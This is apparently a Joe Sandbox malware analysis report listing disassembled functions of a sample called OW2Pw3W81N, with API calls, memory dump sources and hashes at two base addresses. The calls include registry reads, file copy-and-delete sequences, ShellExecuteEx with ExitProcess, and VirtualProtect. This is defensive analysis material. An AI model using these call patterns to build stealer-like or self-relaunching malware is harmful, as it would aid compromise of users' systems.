                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                              • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
                              • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                              • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                              • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                              • RegCloseKey.ADVAPI32(?), ref: 004012FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3466090806-0
                              • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                              • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                              • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                              • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022E151B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 022E1522
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 022E153E
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 022E155C
                              • RegCloseKey.ADVAPI32(?), ref: 022E1566
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                              • Instruction ID: 1941fffdd0fdb456d5666f97491d347a127cb04a2569af42e171ea8f319d9346
                              • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                              • Instruction Fuzzy Hash: 340131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA0697280D6749A018F91
                              APIs
                              • __getptd.LIBCMT ref: 0041C74E
                                • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                              • __getptd.LIBCMT ref: 0041C765
                              • __amsg_exit.LIBCMT ref: 0041C773
                              • __lock.LIBCMT ref: 0041C783
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                              • String ID:
                              • API String ID: 938513278-0
                              • Opcode ID: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                              • Instruction ID: 4c6ecd523783b942696bdc62fd612c852c6eee159b5b032e672b771ca3e86784
                              • Opcode Fuzzy Hash: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                              • Instruction Fuzzy Hash: B0F09632A813119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D28E9E
                              APIs
                              • __getptd.LIBCMT ref: 022FC9B5
                                • Part of subcall function 022FC206: __getptd_noexit.LIBCMT ref: 022FC209
                                • Part of subcall function 022FC206: __amsg_exit.LIBCMT ref: 022FC216
                              • __getptd.LIBCMT ref: 022FC9CC
                              • __amsg_exit.LIBCMT ref: 022FC9DA
                              • __lock.LIBCMT ref: 022FC9EA
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 022FC9FE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                              • String ID:
                              • API String ID: 938513278-0
                              • Opcode ID: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                              • Instruction ID: 166f3ce7acbbe414f0968888a1cc0f23de872fab370fd008bec44d23ddf93d86
                              • Opcode Fuzzy Hash: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                              • Instruction Fuzzy Hash: 4EF0BB329603199BD7F0FBE8950276DF3A1AF04728F10013BDA14A72D8DBA55540DF5D
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,0070F8C0), ref: 0041079A
                              • StrCmpCA.SHLWAPI(00000000,0070F8F0), ref: 00410866
                              • StrCmpCA.SHLWAPI(00000000,0070F900), ref: 0041099D
                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID: `_A
                              • API String ID: 3722407311-2339250863
                              • Opcode ID: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                              • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                              • Opcode Fuzzy Hash: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                              • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,0070F8C0), ref: 0041079A
                              • StrCmpCA.SHLWAPI(00000000,0070F8F0), ref: 00410866
                              • StrCmpCA.SHLWAPI(00000000,0070F900), ref: 0041099D
                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID: `_A
                              • API String ID: 3722407311-2339250863
                              • Opcode ID: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                              • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                              • Opcode Fuzzy Hash: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                              • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                              • ExitProcess.KERNEL32 ref: 00416755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                              • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                              • Opcode Fuzzy Hash: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                              • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 022F68CA
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                              • ShellExecuteEx.SHELL32(0000003C), ref: 022F698D
                              • ExitProcess.KERNEL32 ref: 022F69BC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                              • Instruction ID: a497d63774b96b45848fc12dd20ea59b412fa38e5baa543e264ef2daa43bde68
                              • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                              • Instruction Fuzzy Hash: D63144B5810308ABDB54EFD0CD95FDEB77AAF04300F4041A8E309A2194DB746B88CF59
                              APIs
                              • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID: @Jn@$Jn@$Jn@
                              • API String ID: 544645111-1180188686
                              • Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                              • Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
                              • Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                              • Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                              • lstrcatA.KERNEL32(00000000), ref: 0041A982
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcatlstrcpy
                              • String ID: vI@$vI@
                              • API String ID: 3905823039-1245421781
                              • Opcode ID: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                              • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                              • Opcode Fuzzy Hash: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                              • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                              • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                              • wsprintfW.USER32 ref: 00418D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocProcesswsprintf
                              • String ID: %hs
                              • API String ID: 659108358-2783943728
                              • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                              • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                              • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                              • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                              APIs
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00709C20,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                              • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                              • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                              • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                              • String ID:
                              • API String ID: 257331557-0
                              • Opcode ID: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                              • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                              • Opcode Fuzzy Hash: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                              • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                              APIs
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                • Part of subcall function 022F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022F8DED
                                • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022EA548
                              • lstrlen.KERNEL32(00000000,00000000), ref: 022EA666
                              • lstrlen.KERNEL32(00000000), ref: 022EA923
                                • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                • Part of subcall function 022EA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022EA094
                              • DeleteFileA.KERNEL32(00000000), ref: 022EA9AA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                              • String ID:
                              • API String ID: 257331557-0
                              • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                              • Instruction ID: 66f77940b23073e5b8f163c018d07ff7b1b205f51a9e2381ab5119a804011f84
                              • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                              • Instruction Fuzzy Hash: 4DE1D0729203189BCB55EBE4DD91DEEF33AAF24700F508169E21A72194EF346A4CCF61
                              APIs
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00709C20,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                              • lstrlenA.KERNEL32(00000000), ref: 0040D698
                              • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                              • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                              • Opcode Fuzzy Hash: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                              • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                              APIs
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                • Part of subcall function 022F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022F8DED
                                • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022ED6E8
                              • lstrlen.KERNEL32(00000000), ref: 022ED8FF
                              • lstrlen.KERNEL32(00000000), ref: 022ED913
                              • DeleteFileA.KERNEL32(00000000), ref: 022ED992
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                              • Instruction ID: 16f0b493b00f36047ccff397e235a7e8bab34b486e35654506b43f6b36b20b03
                              • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                              • Instruction Fuzzy Hash: F491E2729203189BCB58FBE4DD65DEEB33AAF64300F504179E60A66194EF346B48CF61
                              APIs
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00709C20,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                              • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                              • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
